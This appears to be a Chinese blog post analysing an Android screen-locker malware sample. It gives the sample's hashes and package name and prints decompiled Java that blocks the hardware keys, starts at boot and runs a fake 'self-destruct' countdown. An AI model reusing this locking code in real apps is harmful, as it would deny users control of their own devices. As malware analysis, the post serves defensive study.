Android病毒样本分析(1)
1.基本信息
病毒名称: 1.apk
文件名称: 建设控件
文件MD5: 5B22058C7632AA3211987B1ABDD8E3D0
文件包名: tk.jianmo.study
数字签名:O=1_sign.apk
2.基本行为
程序启动后直接进入锁屏界面,开机自启动,按键无响应
3.详细分析
1. 通过改写onKeyDown方法,屏蔽返回键、音量键、菜单键等虚拟按键,造成不响应按键动作的效果,来达到锁屏的目的。
@Overridepublic boolean onKeyDown(int paramInt, KeyEvent paramKeyEvent){if (paramInt == 4){if (this.keyTouthInt != 0) {break label151;}this.usedTime = SystemClock.currentThreadTimeMillis();this.keyTouthInt = 1;this.usedTime = System.currentTimeMillis();}for (;;){if (paramInt == 3){keytouch(this.usedTime, this.keyTouthInt, 5);if (this.keyTouthInt == 6) {new MyDialogFragment().show(getFragmentManager(), "mydialog");}}if (paramInt == 82) {keytouch(this.usedTime, this.keyTouthInt, 100);}if (paramInt == 25) {keytouch(this.usedTime, this.keyTouthInt, 2);}if (paramInt == 24) {keytouch(this.usedTime, this.keyTouthInt, 3);}if (paramInt == 26) {Toast.makeText(this, "开机自启,关机无效哦。", 0).show();}return true;label151:if (this.keyTouthInt == 1) {keytouch(this.usedTime, this.keyTouthInt, 1);} else {keytouch(this.usedTime, this.keyTouthInt, 4);}}}
2、程序获取了当前时间,并且设置了时间函数,使程序执行时间到作者设置的时候后,就会自动解除锁屏
startService(this.intent); //启动服务this.sp = getSharedPreferences("TimeSave", 0);this.timetofinish = this.sp.getInt("saveTime", this.timetofinish);if (this.timetofinish <= 1) {this.timetofinish = this.theBeginTimeToFinish;}this.timer = new Timer(); //设置时间this.timertask = new TimerTask(){@Overridepublic void run(){MainActivity.this.runOnUiThread(new Runnable(){@Overridepublic void run(){int i = MainActivity.this.timetofinish / 3600;int j = MainActivity.this.timetofinish % 3600 / 60;int k = MainActivity.this.timetofinish;MainActivity.this.tv_time.setText(new StringBuffer().append(new StringBuffer().append(new StringBuffer().append(new StringBuffer().append(i).append("时").toString()).append(j).toString()).append("分").toString()).append(k % 60).toString() + "秒后手机自爆!");MainActivity.this.sp.edit().putInt("saveTime", MainActivity.this.timetofinish).commit();if (MainActivity.this.timetofinish == 0){MainActivity.this.stopService(MainActivity.this.intent); //终止服务}MainActivity localMainActivity = MainActivity.this;localMainActivity.timetofinish -= 1;}});}};
Android病毒样本分析(1)相关推荐
- android病毒样本分析(红包助手)
目录 1.样本概况... 3 1.1 样本信息... 3 1.2 测试环境及工具... 3 1.3 分析目标... 3 2.具体分析... 4 2.1 加固情况... 4 2.2代码分析片段... 4 ...
- Android病毒样本分析(4)
1.基本信息 病毒名称: SD-Booster.apk 文件名称: SD-booster 文件MD5: 50836808A5FE7FEBB6CE8B2109D6C93A 文件包名: de.mehrma ...
- Android版本的 Wannacry 文件加密病毒样本分析 附带锁机
一.前言 之前一个Wannacry病毒样本在PC端肆意了很久,就是RSA加密文件,勒索钱财.不给钱就删除.但是现在移动设备如此之多,就有一些不法分子想把这个病毒扩散到移动设备了,这几天一个哥们给了一个 ...
- Android版本的Wannacry文件加密病毒样本分析(附带锁机)
一.前言 之前一个Wannacry病毒样本在PC端肆意了很久,就是RSA加密文件,勒索钱财.不给钱就删除.但是现在移动设备如此之多,就有一些不法分子想把这个病毒扩散到移动设备了,这几天一个哥们给了一个 ...
- Android版本的”Wannacry”文件加密病毒样本分析(附带锁机)
一.病毒样本分析 点击免费激活,出现授权界面: 需要设备管理器,是想修改锁机密码,我们就授权,然后分析程序找到重置的密码就好了:授权之后,就被锁屏了,解锁屏幕会出现: 病毒作者真够狠的,竟然自己弄了一 ...
- 无文件攻击与病毒样本分析-1-1-1-无文件攻击介绍
目录 无文件攻击与病毒样本分析-0-1-1-目录_千里ZLP的博客-CSDN博客https://wittpeng.blog.csdn.net/article/details/124712530?spm ...
- 无文件攻击与病毒样本分析-1-4-2-无文件攻击之恶意脚本:WScript和CScript
目录 无文件攻击与病毒样本分析-0-1-1-目录_千里ZLP的博客-CSDN博客在一个月内,将持续研究并发布一套关于"无文件攻击技术与相关病毒样本分析"的系列文章,为便于查看,将在 ...
- incaformat蠕虫病毒样本分析及查杀防范措施
2021incaseformat蠕虫病毒 一.病毒简介 二.样本分析 三.查杀与恢复方式 四.预防措施 一.病毒简介 病毒名称:incaseformat 病毒性质:蠕虫病毒 影响范围:windows ...
- 火绒一面病毒样本分析
样本信息 MD5: 6E4B0A001C493F0FCF8C5E9020958F38 SHA1:BEA213F1C932455AEE8FF6FDE346B1D1960D57FF CRC32: 1 ...
最新文章
- Spring注解详解
- wxpython使用folium_wxPython实现文本框基础组件
- Fiddler 十分钟最全使用介绍
- MySQL存储过程相互调用
- ssh时,密码输入框(密码输入提示)很晚才出现的解决方法
- 怎么看Windows11系统是激活的 Windows11检查激活状态方法
- sop4封装尺寸图_妈妈再也不用担心我PCB封装又做错了~
- html button样式_HTML基础
- YBT 2.4 AC自动机
- 二叉搜索树的后序遍历序列验证
- zbbz插件使用教程_cad坐标标注插件1.73版
- 一见钟情 歌词 翻译
- 终身受用的企业网盘文件管理方案!
- 3 年9.9元,网站从HTTP升级到HTTPS
- 2022暑初二信息竞赛学习成果分享2
- Intellij IDEA 配置Git并拉取项目
- Genesis创世纪
- 嵌入式中断:如何正确设置中断优先级 (万字总结) - 基于Cortex-M和FreeRTOS
- python 福利吧_福利吧自动签到脚本
- 安装计算机一级出现appcrash,appcrash,详细教您运行程序出现appcrash错误该如何解决...
热门文章
- 公众号服务号自定义菜单获取code
- 读书笔记 笨办法学python3
- confluence 制作流程图_「每周开方」 高效制作流程图、思维导图
- 用UltralSO安装CentOS 和 Ubuntu
- 2020.4.23工作记录————Regsvr32加载控件失败:“请确保该二进制存储在指定路径中。。。”
- python selenium教程.pdf_Python实战:selenium教程(12)
- 欧拉计划(鱼C论坛)@20161128
- opacity、transparent以及rgba的区别
- 个人总结的一个VMP脱壳步骤.
- 树莓派无源蜂鸣器c语言,关于raspberry-pi:Python使用树莓派无源蜂鸣器播放铁血丹心...